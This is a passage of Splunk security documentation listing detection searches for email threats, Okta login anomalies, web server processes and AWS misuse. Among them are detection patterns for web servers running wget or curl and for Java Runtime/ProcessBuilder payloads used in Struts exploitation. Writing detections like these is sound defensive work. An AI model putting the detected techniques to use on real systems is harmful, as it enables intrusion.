Splunk® Security Content

Detections

Acrobat logo Download manual as PDF


This documentation does not apply to the most recent version of ESSOC. Click here for the latest version.
Acrobat logo Download topic as PDF

Splunk Security Content Detections


All the detections shipped to different Splunk products. Below is a breakdown by kind.

Application

Detect new login attempts to routers

The search queries the authentication logs for assets that are categorized as routers in the ES Assets and Identity Framework, to identify connections that have not been seen before in the last 30 days.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK:
  • Last Updated: 2017-09-12

Search

| tstats `security_content_summariesonly` count earliest(_time) as earliest latest(_time) as latest from datamodel=Authentication where Authentication.dest_category=router by Authentication.dest Authentication.user | eval isOutlier=if(earliest >= relative_time(now(), "-30d@d"), 1, 0) | where isOutlier=1 | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | `drop_dm_object_name("Authentication")` | `detect_new_login_attempts_to_routers_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must ensure the network router devices are categorized as "router" in the Assets and identity table. You must also populate the Authentication data model with logs related to users authenticating to routing infrastructure.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

Legitimate router connections may appear as new connections

Reference

Test Dataset

version: 1


Email attachments with lots of spaces

Attackers often use spaces as a means to obfuscate an attachment's file extension. This search looks for messages with email attachments that have many spaces within the file names.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Email
  • ATT&CK:
  • Last Updated: 2017-09-19

Search

| tstats `security_content_summariesonly` count values(All_Email.recipient) as recipient_address min(_time) as firstTime max(_time) as lastTime from datamodel=Email where All_Email.file_name="*" by All_Email.src_user, All_Email.file_name All_Email.message_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Email")` | eval space_ratio = (mvcount(split(file_name," "))-1)/len(file_name) | search space_ratio >= 0.1 | rex field=recipient_address "(?<recipient_user>.*)@" | `email_attachments_with_lots_of_spaces_filter`

Associated Analytic Story


How To Implement

You need to ingest data from emails. Specifically, the sender's address and the file names of any attachments must be mapped to the Email data model. The threshold ratio is set to 10%, but this value can be configured to suit each environment. \

**Splunk Phantom Playbook Integration**\

If Splunk Phantom is also configured in your environment, a playbook called "Suspicious Email Attachment Investigate and Delete" can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/` and add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search. The notable event will be sent to Phantom and the playbook will gather further information about the file attachment and its network behaviors. If Phantom finds malicious behavior and an analyst approves of the results, the email will be deleted from the user's inbox.

Required field

Kill Chain Phase

  • Delivery


Known False Positives

None at this time

Reference

Test Dataset

version: 2


Email files written outside of the outlook directory

The search looks at the change-analysis data model and detects email files created outside the normal Outlook directory.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1114.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name=*.pst OR Filesystem.file_name=*.ost) Filesystem.file_path != "C:\\Users\\*\\My Documents\\Outlook Files\\*" Filesystem.file_path!="C:\\Users\\*\\AppData\\Local\\Microsoft\\Outlook*" by Filesystem.action Filesystem.process_id Filesystem.file_name Filesystem.dest | `drop_dm_object_name("Filesystem")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `email_files_written_outside_of_the_outlook_directory_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records the file-system activity from your hosts to populate the Endpoint.Filesystem data model node. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or by other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report file-system reads and writes.

Required field

ATT&CK

ID Technique Tactic
T1114.001 Local Email Collection Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Administrators and users sometimes prefer backing up their email data by moving the email files into a different folder. These attempts will be detected by the search.

Reference

Test Dataset

version: 3


Email servers sending high volume traffic to hosts

This search looks for an increase of data transfers from your email server to your clients. This could be indicative of a malicious actor collecting data using your email server.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Traffic
  • ATT&CK: T1114.002
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` sum(All_Traffic.bytes_out) as bytes_out from datamodel=Network_Traffic where All_Traffic.src_category=email_server by All_Traffic.dest_ip _time span=1d | `drop_dm_object_name("All_Traffic")` | eventstats avg(bytes_out) as avg_bytes_out stdev(bytes_out) as stdev_bytes_out | eventstats count as num_data_samples avg(eval(if(_time < relative_time(now(), "@d"), bytes_out, null))) as per_source_avg_bytes_out stdev(eval(if(_time < relative_time(now(), "@d"), bytes_out, null))) as per_source_stdev_bytes_out by dest_ip | eval minimum_data_samples = 4, deviation_threshold = 3 | where num_data_samples >= minimum_data_samples AND bytes_out > (avg_bytes_out + (deviation_threshold * stdev_bytes_out)) AND bytes_out > (per_source_avg_bytes_out + (deviation_threshold * per_source_stdev_bytes_out)) AND _time >= relative_time(now(), "@d") | eval num_standard_deviations_away_from_server_average = round(abs(bytes_out - avg_bytes_out) / stdev_bytes_out, 2), num_standard_deviations_away_from_client_average = round(abs(bytes_out - per_source_avg_bytes_out) / per_source_stdev_bytes_out, 2) | table dest_ip, _time, bytes_out, avg_bytes_out, per_source_avg_bytes_out, num_standard_deviations_away_from_server_average, num_standard_deviations_away_from_client_average | `email_servers_sending_high_volume_traffic_to_hosts_filter`

Associated Analytic Story


How To Implement

This search requires you to be ingesting your network traffic and populating the Network_Traffic data model. Your email servers must be categorized as "email_server" for the search to work, as well. You may need to adjust the deviation_threshold and minimum_data_samples values based on the network traffic in your environment. The "deviation_threshold" field is a multiplying factor to control how much variation you're willing to tolerate. The "minimum_data_samples" field is the minimum number of connections of data samples required for the statistic to be valid.

Required field

ATT&CK

ID Technique Tactic
T1114.002 Remote Email Collection Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The false-positive rate will vary based on how you set the deviation_threshold and data_samples values. Our recommendation is to adjust these values based on your network traffic to and from your email servers.

Reference

Test Dataset

version: 2


Monitor email for brand abuse

This search looks for emails claiming to be sent from a domain similar to one that you want to have monitored for abuse.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Email
  • ATT&CK:
  • Last Updated: 2018-01-05

Search

| tstats `security_content_summariesonly` values(All_Email.recipient) as recipients, min(_time) as firstTime, max(_time) as lastTime from datamodel=Email by All_Email.src_user, All_Email.message_id | `drop_dm_object_name("All_Email")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | eval temp=split(src_user, "@") | eval email_domain=mvindex(temp, 1) | lookup update=true brandMonitoring_lookup domain as email_domain OUTPUT domain_abuse | search domain_abuse=true | table message_id, src_user, email_domain, recipients, firstTime, lastTime | `monitor_email_for_brand_abuse_filter`

Associated Analytic Story


How To Implement

You need to ingest email header data. Specifically the sender's address (src_user) must be populated. You also need to have run the search "ESCU - DNSTwist Domain Names", which creates the permutations of the domain that will be checked for.

Required field

Kill Chain Phase

  • Delivery


Known False Positives

None at this time

Reference

Test Dataset

version: 2


Multiple okta users with invalid credentials from the same ip

This search detects Okta login failures due to bad credentials for multiple users originating from the same ip address.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.001
  • Last Updated: 2020-07-21

Search

`okta` outcome.reason=INVALID_CREDENTIALS | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | stats min(_time) as firstTime max(_time) as lastTime dc(user) as distinct_users values(user) as users by src_ip, displayMessage, outcome.reason, country, state, city | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search distinct_users > 5 | `multiple_okta_users_with_invalid_credentials_from_the_same_ip_filter`

Associated Analytic Story


How To Implement

This search is specific to Okta and requires Okta logs are being ingested in your Splunk deployment.

Required field

ATT&CK

ID Technique Tactic
T1078.001 Default Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

A single public IP address servicing multiple legitmate users may trigger this search. In addition, the threshold of 5 distinct users may be too low for your needs. You may modify the included filter macro `multiple_okta_users_with_invalid_credentials_from_the_same_ip_filter` to raise the threshold or except specific IP adresses from triggering this search.

Reference

Test Dataset

version: 2


No windows updates in a time frame

This search looks for Windows endpoints that have not generated an event indicating a successful Windows update in the last 60 days. Windows updates are typically released monthly and applied shortly thereafter. An endpoint that has not successfully applied an update in this time frame indicates the endpoint is not regularly being patched for some reason.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Updates
  • ATT&CK:
  • Last Updated: 2017-09-15

Search

| tstats `security_content_summariesonly` max(_time) as lastTime from datamodel=Updates where Updates.status=Installed Updates.vendor_product="Microsoft Windows" by Updates.dest Updates.status Updates.vendor_product | rename Updates.dest as Host | rename Updates.status as "Update Status" | rename Updates.vendor_product as Product | eval isOutlier=if(lastTime <= relative_time(now(), "-60d@d"), 1, 0) | `security_content_ctime(lastTime)` | search isOutlier=1 | rename lastTime as "Last Update Time", | table Host, "Update Status", Product, "Last Update Time" | `no_windows_updates_in_a_time_frame_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, it requires that the 'Update' data model is being populated. This can be accomplished by ingesting Windows events or the Windows Update log via a universal forwarder on the Windows endpoints you wish to monitor. The Windows add-on should be also be installed and configured to properly parse Windows events in Splunk. There may be other data sources which can populate this data model, including vulnerability management systems.

Required field

Kill Chain Phase

Known False Positives

None identified

Reference

Test Dataset

version: 1


Okta account lockout events

Detect Okta user lockout events

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.001
  • Last Updated: 2020-07-21

Search

`okta` displayMessage="Max sign in attempts exceeded" | rename client.geographicalContext.country as country, client.geographicalContext.state as state, client.geographicalContext.city as city | table _time, user, country, state, city, src_ip | `okta_account_lockout_events_filter`

Associated Analytic Story


How To Implement

This search is specific to Okta and requires Okta logs are being ingested in your Splunk deployment.

Required field

ATT&CK

ID Technique Tactic
T1078.001 Default Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

None. Account lockouts should be followed up on to determine if the actual user was the one who caused the lockout, or if it was an unauthorized actor.

Reference

Test Dataset

version: 2


Okta failed sso attempts

Detect failed Okta SSO events

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.001
  • Last Updated: 2020-07-21

Search

`okta` displayMessage="User attempted unauthorized access to app" | stats min(_time) as firstTime max(_time) as lastTime values(app) as Apps count by user, result ,displayMessage, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_failed_sso_attempts_filter`

Associated Analytic Story


How To Implement

This search is specific to Okta and requires Okta logs are being ingested in your Splunk deployment.

Required field

ATT&CK

ID Technique Tactic
T1078.001 Default Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

There may be a faulty config preventing legitmate users from accessing apps they should have access to.

Reference

Test Dataset

version: 2


Okta user logins from multiple cities

This search detects logins from the same user from different cities in a 24 hour period.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.001
  • Last Updated: 2020-07-21

Search

`okta` displayMessage="User login to Okta" client.geographicalContext.city!=null | stats min(_time) as firstTime max(_time) as lastTime dc(client.geographicalContext.city) as locations values(client.geographicalContext.city) as cities values(client.geographicalContext.state) as states by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_user_logins_from_multiple_cities_filter` | search locations > 1

Associated Analytic Story


How To Implement

This search is specific to Okta and requires Okta logs are being ingested in your Splunk deployment.

Required field

ATT&CK

ID Technique Tactic
T1078.001 Default Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

Users in your enviornment may legitmately be travelling and loggin in from different locations. This search is useful for those users that should *not* be travelling for some reason, such as the COVID-19 pandemic. The search also relies on the geographical information being populated in the Okta logs. It is also possible that a connection from another region may be attributed to a login from a remote VPN endpoint.

Reference

Test Dataset

version: 2


Phishing email detection by machine learning method - ssa

Malicious mails can conduct phishing that induces readers to open attachment, click links or trigger third party service. This detect uses Natural Language Processing (NLP) approach to analyze an email message's content (Sender, Subject and Body) and judge whether it is a phishing email. The detection adopts a deep learning (neural network) model that employs character level embeddings plus LSTM layers to perform classification. The model is pre-trained and then published as ONNX format. Current sample model is trained using the dataset published at https://github.com/splunk/attack_data/tree/master/datasets/T1566_Phishing_Email/splunk_train.json User are expected to re-train the model by combining with their own training data for better accuracy using the provided model file (SMLE notebook). DSP pipeline then processes the email message and passes it as an event to Apply ML Models function, which returns the probability of a phishing email. Current implementation assumes the email is fed to DSP in JSON format contains at least email's sender, subject and its message body, including reply content, if any.

  • Product: UEBA for Security Cloud
  • Datamodel:
  • ATT&CK: T1566
  • Last Updated: 2020-08-25

Search

| from read_ssa_enriched_events() | eval eventLine=concat(ucast(map_get(input_event, "From"), "string", " "), " ", ucast(map_get(input_event, "Subject"), "string", " "), " ", ucast(map_get(input_event, "Content"), "string", " "), " "), _time=map_get(input_event, "_time") | where eventLine IS NOT NULL | eval mapC={" ": 32, "!": 33, "\"": 34, "#": 35, "$": 36, "%": 37, "&": 38, "`": 39, "(": 40, ")": 41, "*": 42, "+": 43, ",": 44, "-": 45, ".": 46, "/": 47, "0": 48, "1": 49, "2": 50, "3": 51, "4": 52, "5": 53, "6": 54, "7": 55, "8": 56, "9": 57, ":": 58, ";": 59, "<": 60, "=": 61, ">": 62, "?": 63, "@": 64, "A": 65, "B": 66, "C": 67, "D": 68, "E": 69, "F": 70, "G": 71, "H": 72, "I": 73, "J": 74, "K": 75, "L": 76, "M": 77, "N": 78, "O": 79, "P": 80, "Q": 81, "R": 82, "S": 83, "T": 84, "U": 85, "V": 86, "W": 87, "X": 88, "Y": 89, "Z": 90, "[": 91, "\\": 92, "]": 93, "^": 94, "_": 95, "`": 96, "a": 97, "b": 98, "c": 99, "d": 100, "e": 101, "f": 102, "g": 103, "h": 104, "i": 105, "j": 106, "k": 107, "l": 108, "m": 109, "n": 110, "o": 111, "p": 112, "q": 113, "r": 114, "s": 115, "t": 116, "u": 117, "v": 118, "w": 119, "x": 120, "y": 121, "z": 122, "{": 123, " |": 124, "}": 125, "~": 126}, ml_in = for_each(iterator(mvrange(1,129), "i"), cast(map_get(mapC, substr(eventLine, i, 1)), "float") ) | apply_model connection_id="YOUR_S3_ONNX_CONNECTOR_ID" name="phishing_email_v8" path="s3://smle-experiments/models/phishing_email" | eval probability = mvindex(ml_out, 0) | where probability > 0.5 | eval start_time=_time, end_time=_time, entities="TBD", body="TBD" | select probability, body, entities, start_time, end_time | into write_ssa_detected_events();

Associated Analytic Story

How To Implement

Events are fed to DSP contains at least email's sender, subject and its message body.

Required field

ATT&CK

ID Technique Tactic
T1566 Phishing Initial Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Because of imbalance of anomaly data in training, the model will less likely report false positive. Instead, the model is more prone to false negative. Current best recall score is ~85%

Reference

Test Dataset

version: 1


Spectre and meltdown vulnerable systems

The search is used to detect systems that are still vulnerable to the Spectre and Meltdown vulnerabilities.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Vulnerabilities
  • ATT&CK:
  • Last Updated: 2017-01-07

Search

| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Vulnerabilities where Vulnerabilities.cve ="CVE-2017-5753" OR Vulnerabilities.cve ="CVE-2017-5715" OR Vulnerabilities.cve ="CVE-2017-5754" by Vulnerabilities.dest | `drop_dm_object_name(Vulnerabilities)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spectre_and_meltdown_vulnerable_systems_filter`

Associated Analytic Story


How To Implement

The search requires that you are ingesting your vulnerability-scanner data and that it reports the CVE of the vulnerability identified.

Required field

Kill Chain Phase

Known False Positives

It is possible that your vulnerability scanner is not detecting that the patches have been applied.

Reference

Test Dataset

version: 1


Suspicious email - uba anomaly

This detection looks for emails that are suspicious because of their sender, domain rareness, or behavior differences. This is an anomaly generated by Splunk User Behavior Analytics (UBA).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: UEBA
  • ATT&CK: T1566
  • Last Updated: 2020-07-22

Search

|tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_UEBA_Events.category) as category from datamodel=UEBA where nodename=All_UEBA_Events.UEBA_Anomalies All_UEBA_Events.UEBA_Anomalies.uba_model = "SuspiciousEmailDetectionModel" by All_UEBA_Events.description All_UEBA_Events.severity All_UEBA_Events.user All_UEBA_Events.uba_event_type All_UEBA_Events.link All_UEBA_Events.signature All_UEBA_Events.url All_UEBA_Events.UEBA_Anomalies.uba_model | `drop_dm_object_name(All_UEBA_Events)` | `drop_dm_object_name(UEBA_Anomalies)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_email___uba_anomaly_filter`

Associated Analytic Story


How To Implement

You must be ingesting data from email logs and have Splunk integrated with UBA. This anomaly is raised by a UBA detection model called "SuspiciousEmailDetectionModel." Ensure that this model is enabled on your UBA instance.

Required field

ATT&CK

ID Technique Tactic
T1566 Phishing Initial Access


Kill Chain Phase

  • Delivery


Known False Positives

This detection model will alert on any sender domain that is seen for the first time. This could be a potential false positive. The next step is to investigate and add the URL to an allow list if you determine that it is a legitimate sender.

Reference

Test Dataset

version: 3


Suspicious email attachment extensions

This search looks for emails that have attachments with suspicious file extensions.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Email
  • ATT&CK: T1566.001
  • Last Updated: 2020-07-22

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Email where All_Email.file_name="*" by All_Email.src_user, All_Email.file_name All_Email.message_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name("All_Email")` | `suspicious_email_attachments` | `suspicious_email_attachment_extensions_filter`

Associated Analytic Story


How To Implement

You need to ingest data from emails. Specifically, the sender's address and the file names of any attachments must be mapped to the Email data model. \

**Splunk Phantom Playbook Integration**\

If Splunk Phantom is also configured in your environment, a Playbook called "Suspicious Email Attachment Investigate and Delete" can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, and add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search. The notable event will be sent to Phantom and the playbook will gather further information about the file attachment and its network behaviors. If Phantom finds malicious behavior and an analyst approves of the results, the email will be deleted from the user's inbox.

Required field

ATT&CK

ID Technique Tactic
T1566.001 Spearphishing Attachment Initial Access


Kill Chain Phase

  • Delivery


Known False Positives

None identified

Reference

Test Dataset

version: 3


Suspicious java classes

This search looks for suspicious Java classes that are often used to exploit remote command execution in common Java frameworks, such as Apache Struts.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-12-06

Search

`stream_http` http_method=POST http_content_length>1 | regex form_data="(?i)java\.lang\.(?:runtime |processbuilder)" | rename src_ip as src | stats count earliest(_time) as firstTime, latest(_time) as lastTime, values(url) as uri, values(status) as status, values(http_user_agent) as http_user_agent by src, dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_java_classes_filter`

Associated Analytic Story


How To Implement

In order to properly run this search, Splunk needs to ingest data from your web-traffic appliances that serve or sit in the path of your Struts application servers. This can be accomplished by indexing data from a web proxy, or by using network traffic-analysis tools, such as Splunk Stream or Bro.

Required field

Kill Chain Phase

  • Exploitation


Known False Positives

There are no known false positives.

Reference

Test Dataset

version: 1


Web servers executing suspicious processes

This search looks for suspicious processes on all systems labeled as web servers.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1082
  • Last Updated: 2019-04-01

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.dest_category="web_server" AND (Processes.process="*whoami*" OR Processes.process="*ping*" OR Processes.process="*iptables*" OR Processes.process="*wget*" OR Processes.process="*service*" OR Processes.process="*curl*") by Processes.process Processes.process_name, Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `web_servers_executing_suspicious_processes_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model. In addition, web servers will need to be identified in the Assets and Identity Framework of Enterprise Security.

Required field

ATT&CK

ID Technique Tactic
T1082 System Information Discovery Discovery


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Some of these processes may be used legitimately on web servers during maintenance or other administrative tasks.

Reference

Test Dataset

version: 1



Cloud

Aws cross account activity from previously unseen account

This search looks for AssumeRole events where an IAM role in a different account is requested for the first time. This search is deprecated and have been translated to use the latest Authentication Datamodel.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Authentication
  • ATT&CK:
  • Last Updated: 2020-05-28

Search

| tstats min(_time) as firstTime max(_time) as lastTime from datamodel=Authentication where Authentication.signature=AssumeRole by Authentication.vendor_account Authentication.user Authentication.src Authentication.user_role | `drop_dm_object_name(Authentication)` | rex field=user_role "arn:aws:sts:*:(?<dest_account>.*):" | where vendor_account != dest_account | rename vendor_account as requestingAccountId dest_account as requestedAccountId | lookup previously_seen_aws_cross_account_activity requestingAccountId, requestedAccountId, OUTPUTNEW firstTime | eval status = if(firstTime > relative_time(now(), "-24h@h"),"New Cross Account Activity","Previously Seen") | where status = "New Cross Account Activity" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_cross_account_activity_from_previously_unseen_account_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen AWS Cross Account Activity - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen AWS Cross Account Activity - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `aws_cross_account_activity_from_previously_unseen_account_filter` macro.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

Using multiple AWS accounts and roles is perfectly valid behavior. It's suspicious when an account requests privileges of an account it hasn't before. You should validate with the account owner that this is a legitimate request.

Reference

Test Dataset


version: 1


Aws detect users creating keys with encrypt policy without mfa

This search provides detection of KMS keys which action kms:Encrypt is accessible for everyone (also outside of your organization). This is an identicator that your account is compromised and the attacker uses the encryption key to compromise another company.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1486
  • Last Updated: 2021-01-11

Search

`cloudtrail` eventName=CreateKey OR eventName=PutKeyPolicy | spath input=requestParameters.policy output=key_policy_statements path=Statement{} | mvexpand key_policy_statements | spath input=key_policy_statements output=key_policy_action_1 path=Action | spath input=key_policy_statements output=key_policy_action_2 path=Action{} | eval key_policy_action=mvappend(key_policy_action_1, key_policy_action_2) | spath input=key_policy_statements output=key_policy_principal path=Principal.AWS | search key_policy_action="kms:Encrypt" AND key_policy_principal="*" | stats count min(_time) as firstTime max(_time) as lastTime by eventName eventSource eventID awsRegion userIdentity.principalId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_detect_users_creating_keys_with_encrypt_policy_without_mfa_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudtrail logs

Required field

ATT&CK

ID Technique Tactic
T1486 Data Encrypted for Impact Impact


Kill Chain Phase

Known False Positives

unknown

Reference


Test Dataset


version: 1


Aws detect users with kms keys performing encryption s3

This search provides detection of users with KMS keys performing encryption specifically against S3 buckets.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1486
  • Last Updated: 2021-01-11

Search

`cloudtrail` eventName=CopyObject requestParameters.x-amz-server-side-encryption="aws:kms" | rename requestParameters.bucketName AS bucket_name, requestParameters.x-amz-copy-source AS src_file, requestParameters.key AS dest_file | stats count min(_time) as firstTime max(_time) as lastTime values(src_file) AS src_file values(dest_file) AS dest_file values(userAgent) AS userAgent values(region) AS region values(src) AS src by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_detect_users_with_kms_keys_performing_encryption_s3_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudtrail logs

Required field

ATT&CK

ID Technique Tactic
T1486 Data Encrypted for Impact Impact


Kill Chain Phase

Known False Positives

bucket with S3 encryption

Reference


Test Dataset


version: 1


Aws eks kubernetes cluster sensitive object access

This search provides information on Kubernetes accounts accessing sensitve objects such as configmaps or secrets

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-06-23

Search

`aws_cloudwatchlogs_eks` objectRef.resource=secrets OR configmaps sourceIPs{}!=::1 sourceIPs{}!=127.0.0.1 |table sourceIPs{} user.username user.groups{} objectRef.resource objectRef.namespace objectRef.name annotations.authorization.k8s.io/reason |dedup user.username user.groups{} |`aws_eks_kubernetes_cluster_sensitive_object_access_filter`

Associated Analytic Story


How To Implement

You must install Splunk Add-on for Amazon Web Services and Splunk App for AWS. This search works with cloudwatch logs.

Required field

Kill Chain Phase

  • Lateral Movement


Known False Positives

Sensitive object access is not necessarily malicious but user and object context can provide guidance for detection.

Reference

Test Dataset

version: 1


Aws network access control list created with all open ports

The search looks for CloudTrail events to detect if any network ACLs were created with all the ports open to a specified CIDR.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1562.007
  • Last Updated: 2021-01-11

Search

`cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol=-1 | append [search `cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol!=-1 | eval port_range='requestParameters.portRange.to' - 'requestParameters.portRange.from' | where port_range>1024] | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId eventName requestParameters.ruleAction requestParameters.egress requestParameters.aclProtocol requestParameters.portRange.to requestParameters.portRange.from src userAgent requestParameters.cidrBlock | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_network_access_control_list_created_with_all_open_ports_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS, version 4.4.0 or later, and configure your CloudTrail inputs.

Required field

ATT&CK

ID Technique Tactic
T1562.007 Disable or Modify Cloud Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that an admin has created this ACL with all ports open for some legitimate purpose however, this should be scoped and not allowed in production environment.

Reference

Test Dataset


version: 2


Aws network access control list deleted

Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the AWS console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the CloudTrail logs to detect users deleting network ACLs.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1562.007
  • Last Updated: 2021-01-12

Search

`cloudtrail` eventName=DeleteNetworkAclEntry requestParameters.egress=false | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId eventName requestParameters.egress src userAgent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_network_access_control_list_deleted_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs.

Required field

ATT&CK

ID Technique Tactic
T1562.007 Disable or Modify Cloud Firewall Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a user has legitimately deleted a network ACL.

Reference

Test Dataset


version: 2


Aws saml access by provider user and principal

This search provides specific SAML access from specific Service Provider, user and targeted principal at AWS. This search provides specific information to detect abnormal access or potential credential hijack or forgery, specially in federated environments using SAML protocol inside the perimeter or cloud provider.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2021-01-26

Search

`cloudtrail` eventName=Assumerolewithsaml | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.principalArn requestParameters.roleArn requestParameters.roleSessionName recipientAccountId responseElements.issuer sourceIPAddress userAgent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_saml_access_by_provider_user_and_principal_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add on and Splunk App for AWS. This search works with cloudtrail logs

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

Known False Positives

Attacks using a Golden SAML or SAML assertion hijacks or forgeries are very difficult to detect as accessing cloud providers with these assertions looks exactly like normal access, however things such as source IP sourceIPAddress user, and principal targeted at receiving cloud provider along with endpoint credential access and abuse detection searches can provide the necessary context to detect these attacks.

Reference


Test Dataset


version: 1


Aws saml update identity provider

